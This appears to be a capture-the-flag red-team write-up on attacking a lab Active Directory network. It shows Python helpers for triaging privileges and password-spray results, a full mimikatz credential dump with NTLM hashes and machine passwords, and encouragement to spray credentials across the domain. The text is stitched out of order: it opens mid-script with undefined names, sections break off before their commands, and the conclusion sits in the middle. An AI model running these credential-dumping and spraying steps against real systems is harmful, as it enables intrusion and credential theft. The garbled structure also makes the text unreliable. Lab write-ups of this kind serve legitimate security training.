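RISKY_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate connecting clients; classic precondition for escalation to SYSTEM",
    "SeAssignPrimaryTokenPrivilege": "assign primary tokens; same risk class as SeImpersonate",
    "SeDebugPrivilege": "open any process, including LSASS, for memory access",
    "SeBackupPrivilege": "read any file regardless of ACL, including registry hives",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
}


def parse_whoami_section(text, title):
    """Return the rows of one `whoami /all` section as dicts keyed by the column headers."""
    lines = text.splitlines()
    start = next((i for i, l in enumerate(lines) if l.strip() == title), None)
    if start is None:
        return []
    under = next((i for i in range(start + 1, len(lines))
                  if re.fullmatch(r" *=+[= ]*", lines[i])), None)
    if under is None:
        return []
    # Each run of '=' marks one column; the header row sits directly above it.
    spans = [(m.start(), m.end()) for m in re.finditer(r"=+", lines[under])]
    headers = [lines[under - 1][a:b].strip() for a, b in spans]
    rows = []
    for line in lines[under + 1:]:
        if not line.strip():
            break  # a blank line ends the section
        cells = [line[a:b].strip() for a, b in spans[:-1]]
        cells.append(line[spans[-1][0]:].strip())  # last column runs to end of line
        rows.append(dict(zip(headers, cells)))
    return rows


def triage_whoami_all(text):
    """Flag local-admin membership and held high-impact privileges as (kind, name, state, why)."""
    findings = []
    for grp in parse_whoami_section(text, "GROUP INFORMATION"):
        if grp.get("SID") == LOCAL_ADMIN_SID:
            findings.append(("group", grp["Group Name"], "", "member of local Administrators"))
    for priv in parse_whoami_section(text, "PRIVILEGES INFORMATION"):
        name = priv.get("Privilege Name")
        if name in RISKY_PRIVILEGES:
            findings.append(("privilege", name, priv.get("State", ""), RISKY_PRIVILEGES[name]))
    return findings


if __name__ == "__main__":
    for kind, name, state, why in triage_whoami_all(SAMPLE_WHOAMI_ALL):
        print(f"[{kind}] {name} {state}: {why}")
```

For the account in the writeup, the same check would report the Administrators membership and every entry in its long privilege list, which is the least-privilege finding: a web service account that is a local admin on another server is exactly what turns a cracked service password into a second compromised host.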

Again, mimikatz was uploaded to check for cached credentials, but nothing useful was found.

*Evil-WinRM* PS C:\windows\tasks> ./mimikatz.exe privilege::debug sekurlsa::logonpasswords exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : DEV-SRV01$
Domain            : CORP
Logon Server      : (null)
Logon Time        : 11/6/2024 11:23:48 AM
SID               : S-1-5-20
	msv :
	 [00000003] Primary
	 * Username : DEV-SRV01$
	 * Domain   : CORP
	 * NTLM     : 684fff6a76f28089cd6aeaaf8364f51b
	 * SHA1     : 8e57f40a118accbb5e7f5e418c5eeca2663c0802
	 * DPAPI    : 8e57f40a118accbb5e7f5e418c5eeca2
	tspkg :
	wdigest :
	 * Username : DEV-SRV01$
	 * Domain   : CORP
	 * Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
	kerberos :
	 * Username : dev-srv01$
	 * Domain   : CORP.DARKLAB.LOCAL
	 * Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
	ssp :
	credman :

Authentication Id : 0 ; 30271 (00000000:0000763f)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 11/6/2024 11:23:48 AM
SID               : S-1-5-96-0-1
	msv :
	 [00000003] Primary
	 * Username : DEV-SRV01$
	 * Domain   : CORP
	 * NTLM     : 684fff6a76f28089cd6aeaaf8364f51b
	 * SHA1     : 8e57f40a118accbb5e7f5e418c5eeca2663c0802
	 * DPAPI    : 8e57f40a118accbb5e7f5e418c5eeca2
	tspkg :
	wdigest :
	 * Username : DEV-SRV01$
	 * Domain   : CORP
	 * Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
	kerberos :
	 * Username : DEV-SRV01$
	 * Domain   : corp.darklab.local
	 * Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
	ssp :
	credman :

Authentication Id : 0 ; 28984 (00000000:00007138)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 11/6/2024 11:23:47 AM
SID               :
	msv :
	 [00000003] Primary
	 * Username : DEV-SRV01$
	 * Domain   : CORP
	 * NTLM     : 684fff6a76f28089cd6aeaaf8364f51b
	 * SHA1     : 8e57f40a118accbb5e7f5e418c5eeca2663c0802
	 * DPAPI    : 8e57f40a118accbb5e7f5e418c5eeca2
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id : 0 ; 62634 (00000000:0000f4aa)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 11/6/2024 11:23:49 AM
SID               : S-1-5-90-0-1
	msv :
	 [00000003] Primary
	 * Username : DEV-SRV01$
	 * Domain   : CORP
	 * NTLM     : b2dbac9f8b8f8023b765b1d95ab5ff74
	 * SHA1     : fc7d62eb509e806432c9942cd4c68e5bafee29b3
	 * DPAPI    : fc7d62eb509e806432c9942cd4c68e5b
	tspkg :
	wdigest :
	 * Username : DEV-SRV01$
	 * Domain   : CORP
	 * Password : $v:b^q]d^kOS;#m?tl4g6P4Tojx_#@@H!Z=3O_u!g2K(w2[hN<LHUQJd`t2YP3/cL,( xuuRoWn,wfaC7!X/;kMZvFk-a^N"8TxkgrQ_LQX/,4LBDh%NcAx4
	kerberos :
	 * Username : DEV-SRV01$
	 * Domain   : corp.darklab.local
	 * Password : $v:b^q]d^kOS;#m?tl4g6P4Tojx_#@@H!Z=3O_u!g2K(w2[hN<LHUQJd`t2YP3/cL,( xuuRoWn,wfaC7!X/;kMZvFk-a^N"8TxkgrQ_LQX/,4LBDh%NcAx4
	ssp :
	credman :

Authentication Id : 0 ; 62269 (00000000:0000f33d)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 11/6/2024 11:23:49 AM
SID               : S-1-5-90-0-1
	msv :
	 [00000003] Primary
	 * Username : DEV-SRV01$
	 * Domain   : CORP
	 * NTLM     : 684fff6a76f28089cd6aeaaf8364f51b
	 * SHA1     : 8e57f40a118accbb5e7f5e418c5eeca2663c0802
	 * DPAPI    : 8e57f40a118accbb5e7f5e418c5eeca2
	tspkg :
	wdigest :
	 * Username : DEV-SRV01$
	 * Domain   : CORP
	 * Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
	kerberos :
	 * Username : DEV-SRV01$
	 * Domain   : corp.darklab.local
	 * Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
	ssp :
	credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 11/6/2024 11:23:49 AM
SID               : S-1-5-19
	msv :
	tspkg :
	wdigest :
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 30264 (00000000:00007638)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 11/6/2024 11:23:48 AM
SID               : S-1-5-96-0-0
	msv :
	 [00000003] Primary
	 * Username : DEV-SRV01$
	 * Domain   : CORP
	 * NTLM     : 684fff6a76f28089cd6aeaaf8364f51b
	 * SHA1     : 8e57f40a118accbb5e7f5e418c5eeca2663c0802
	 * DPAPI    : 8e57f40a118accbb5e7f5e418c5eeca2
	tspkg :
	wdigest :
	 * Username : DEV-SRV01$
	 * Domain   : CORP
	 * Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
	kerberos :
	 * Username : DEV-SRV01$
	 * Domain   : corp.darklab.local
	 * Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
	ssp :
	credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DEV-SRV01$
Domain            : CORP
Logon Server      : (null)
Logon Time        : 11/6/2024 11:23:47 AM
SID               : S-1-5-18
	msv :
	tspkg :
	wdigest :
	 * Username : DEV-SRV01$
	 * Domain   : CORP
	 * Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
	kerberos :
	 * Username : dev-srv01$
	 * Domain   : CORP.DARKLAB.LOCAL
	 * Password : (null)
	ssp :
	credman :

mimikatz(commandline) # exit
Bye!

Note: I lost the flag and the screenshot for it, but trust me, we got it

Easy Initial Access - 2

Category: Red Team
Points: 50

Two easily accessible external-facing services are there for obtaining initial access! If you have flags from external servers, attempt to input them into either Easy Initial Access - 1 or Easy Initial Access - 2. Both entry points offer identical information to assist you in hacking into the corporate internal network!

Flag format for red team: Hack{[sha256string]}

Going nowhere with DEV-SRV01, I went back to WEB-SRV01 to find the second flag for initial access. Stumbling around, I found it within C:\xampp\htdocs.

That got us the flag, which saved us for a short time.

Hack{[a4b743lce84b09e00334da20c6bbbl6d96802dc207b5afb76f6lc0a02a7e060e]}

Mistakes Made This Year

So, with that said, what went wrong this time? Credential reuse. Remember the user tester? We did not reuse that set of credentials anywhere. The second thing that went wrong was that we were the Local Administrator of DEV-SRV01, meaning we could have dumped domain cached credentials from the SAM and SYSTEM hives, which I did. However, cracking those credentials took ages and my laptop was becoming hot.

In conclusion, even though I did not complete all of the Active Directory challenges, I was proud that I was able to do the challenges properly this time with the knowledge I gained while preparing for my OSCP, and that I was able to learn how to use the Sliver C2 for the OSEP, which I am currently preparing for. I hope you learned something from this write-up. Now, let me check my costs for running an instance on AWS the whole day...

Now that we have a foothold, let's see what privileges we have. As shown below, we have SeImpersonatePrivilege. My go-to tool for escalating privileges with this misconfiguration is PrintSpoofer. My second go-to tool is GodPotato, but that only works if the target has .NET installed.

With that, let's configure Ligolo for pivoting into the internal network. Start by adding a new interface on the attacker machine.

Now that we have a second set of credentials, NetExec can be used to spray them across the domain to check whether the user can access any of the internal machines. Learn from Counter-Strike: always SPRAY AND PRAY. The credentials can be sprayed using the following command:
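The author's exact spray command is not reproduced on the page. As an added example (not the author's command and not a NetExec feature), the script below assumes the spray was run along the lines of `nxc smb 10.10.10.0/24 -u tester -p '<password>' --continue-on-success | tee spray.log` (the subnet, account and file name are assumptions) and triages the resulting log: which hosts accepted the credential, where NetExec's `(Pwn3d!)` marker says the account is a local administrator, and whether any host answered `STATUS_ACCOUNT_LOCKED_OUT`, which is the signal to stop spraying that account. `SPRAY_LOG` is constructed output in NetExec's column layout.

```python
"""Triage NetExec (nxc) credential-spray output.

Added example for this write-up; not the author's command and not part of
NetExec. SPRAY_LOG is constructed in NetExec's "PROTO IP PORT HOST [status]
DOMAIN\\user:secret note" layout.
"""
import re

# [+] / [-] result lines only; [*] banner lines deliberately do not match.
LINE = re.compile(
    r"^(?P<proto>\S+)\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+"
    r"\[(?P<status>[+-])\]\s+(?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<secret>\S+)"
    r"(?:\s+(?P<note>.*))?$"
)

SPRAY_LOG = """\
SMB         10.10.10.5      445    DEV-SRV01        [*] Windows Server 2019 Build 17763 x64 (name:DEV-SRV01) (domain:corp.darklab.local) (signing:False) (SMBv1:False)
SMB         10.10.10.5      445    DEV-SRV01        [+] corp.darklab.local\\tester:ConstructedPass1 (Pwn3d!)
SMB         10.10.10.6      445    WEB-SRV01        [-] corp.darklab.local\\tester:ConstructedPass1 STATUS_LOGON_FAILURE
SMB         10.10.10.10     445    DC01             [+] corp.darklab.local\\tester:ConstructedPass1
SMB         10.10.10.11     445    FILE01           [-] corp.darklab.local\\tester:ConstructedPass1 STATUS_ACCOUNT_LOCKED_OUT
"""


def parse_spray(text):
    """Return {'valid', 'admin', 'failed'} -> list of (host, ip, note) in log order."""
    result = {"valid": [], "admin": [], "failed": []}
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # banners and anything that is not a [+]/[-] result
        entry = (m["host"], m["ip"], (m["note"] or "").strip())
        if m["status"] == "+":
            result["valid"].append(entry)
            if "(Pwn3d!)" in entry[2]:  # local admin on that host
                result["admin"].append(entry)
        else:
            result["failed"].append(entry)
    return result


def lockout_warnings(result):
    """Hosts that returned STATUS_ACCOUNT_LOCKED_OUT: stop spraying this account."""
    return [host for host, _ip, note in result["failed"] if "LOCKED_OUT" in note]


def next_targets(result):
    """Admin hosts first (credential dumping), then hosts that merely accept the logon."""
    admin = [h for h, _, _ in result["admin"]]
    return admin + [h for h, _, _ in result["valid"] if h not in admin]


if __name__ == "__main__":
    r = parse_spray(SPRAY_LOG)
    print("valid  :", [h for h, _, _ in r["valid"]])
    print("admin  :", [h for h, _, _ in r["admin"]])
    print("lockout:", lockout_warnings(r))
    print("order  :", next_targets(r))
```

Feed it the saved `spray.log` instead of `SPRAY_LOG`. Checking the domain lockout policy (`nxc smb <dc> -u <user> -p <pass> --pass-pol`) before the first spray is what keeps the `lockout_warnings` list empty.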